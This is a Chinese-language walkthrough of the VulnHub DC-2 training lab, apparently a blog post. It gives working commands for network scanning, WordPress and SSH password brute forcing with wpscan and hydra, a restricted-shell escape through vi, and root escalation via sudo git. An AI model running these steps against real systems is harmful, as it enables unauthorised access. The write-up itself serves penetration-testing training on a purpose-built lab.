DC-2靶机攻略

靶机地址

https://www.vulnhub.com/entry/dc-2,311/
DC-2.zip (Size: 847 MB)
Download: http://www.five86.com/downloads/DC-2.zip
Download (Mirror): https://download.vulnhub.com/dc/DC-2.zip
Download (Torrent): https://download.vulnhub.com/dc/DC-2.zip.torrent ( Magnet)

靶机描述

Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.

As with the original DC-1, it's designed with beginners in mind.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

Just like with DC-1, there are five flags including the final flag.

And again, just like with DC-1, the flags are important for beginners, but not so important for those who have experience.

In short, the only flag that really counts, is the final flag.

For beginners, Google is your friend. Well, apart from all the privacy concerns etc etc.

I haven't explored all the ways to achieve root, as I scrapped the previous version I had been working on, and started completely fresh apart from the base OS install.
TECHNICAL INFORMATION
Please note that you will need to set the hosts file on your pentesting device to something like:

192.168.0.145 dc-2

信息收集

靶机地址:192.168.0.131
攻击机地址:192.168.0.102
根据描述中的提示确认DC-2 中有5个flag需要收集
以及需要设置hosts文件解析DC-2地址
通过命令nmap -sP 192.168.0.0/24确认靶机地址为192.168.0.131
全端口进行探测nmap -A -p- 192.168.0.131

发现开放80、7744端口,访问80页面,根据提示需先设置host文件:echo "192.168.0.131 dc-2" >> /etc/hosts
访问发现是个WordPress的站点,然后在flag下发现flag1

漏洞利用及提权

这里提到了cewl工具,可抓取网站信息用于生成密码,cewl http://dc-2 -w output.txt

在用wpscan枚举用户名进行爆破wpscan --url http://dc-2 -e u,发现存在admin、jerry、tom三个用户。

利用wpscan --url http://dc-2 --passwords ./output.txt 进行密码爆破,爆破出jerry和tom的密码

接着在 http://dc-2/wp-login.php 页面登录,登录jerry账户后在Pages发现flag2

那这里提示说WordPress拿不下来就要找方法,(这里我也尝试用wpscan进行漏洞扫描,此处需要wpscan的账号API(需在https://wpscan.com/注册账户),使用wpscan --url http://dc-2 --api-token [YOUR APIToken]进行WordPress漏洞扫描,扫描发现大多是XSS类型的漏洞,有关命令执行的漏洞等利用条件比较麻烦)

那这里可以从之前发现的SSH端口7744入手进行SSH爆破,利用hydra使用之前获取的账户及cewl生成的密码进行爆破
hydra -L ./dc2user.txt -P output.txt -s 7744 ssh://192.168.0.131 发现了tom账户

SSH登录tom账户后,发现tom用户目录下存在flag3.txt,但我们执行cat命令是发现这是rbash(受限制的bash),通过echo /home/tom/usr/bin/* 查看我们当前可执行less、ls、scp、vi

那这里我们先用less命令查看flag3.txt

这里提示了tom、jerry、su,那less /etc/passwd 发现jerry账户

接下来就是涉及到rbash逃逸的内容,具体参考的是https://www.freebuf.com/articles/system/188989.html
我们采用set shell 的方式进行逃逸
vi
:set shell=/bin/sh
:shell


之后我们要设置环境变量绕过bash限制
export PATH=$PATH:/bin:/usr/bin
echo $PATH

再根据提示切换到jerry用户,在用户目录下发现了flag4.txt

接着cd到/tmp/目录下sudo -l发现git命令是不需要密码的,那就是用git进行提权

两种方法
1、sudo git help config
在末行命令模式输入 !/bin/bash!'sh' 完成提权
2、sudo git -p help
!/bin/bash

最后就是在root目录下发现final-flag.txt

参考链接:https://www.jianshu.com/p/c183392bc0e9?utm_campaign=haruki&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

posted @ 2021-05-03 15:05  shadow-ink  阅读(465)  评论(0编辑  收藏  举报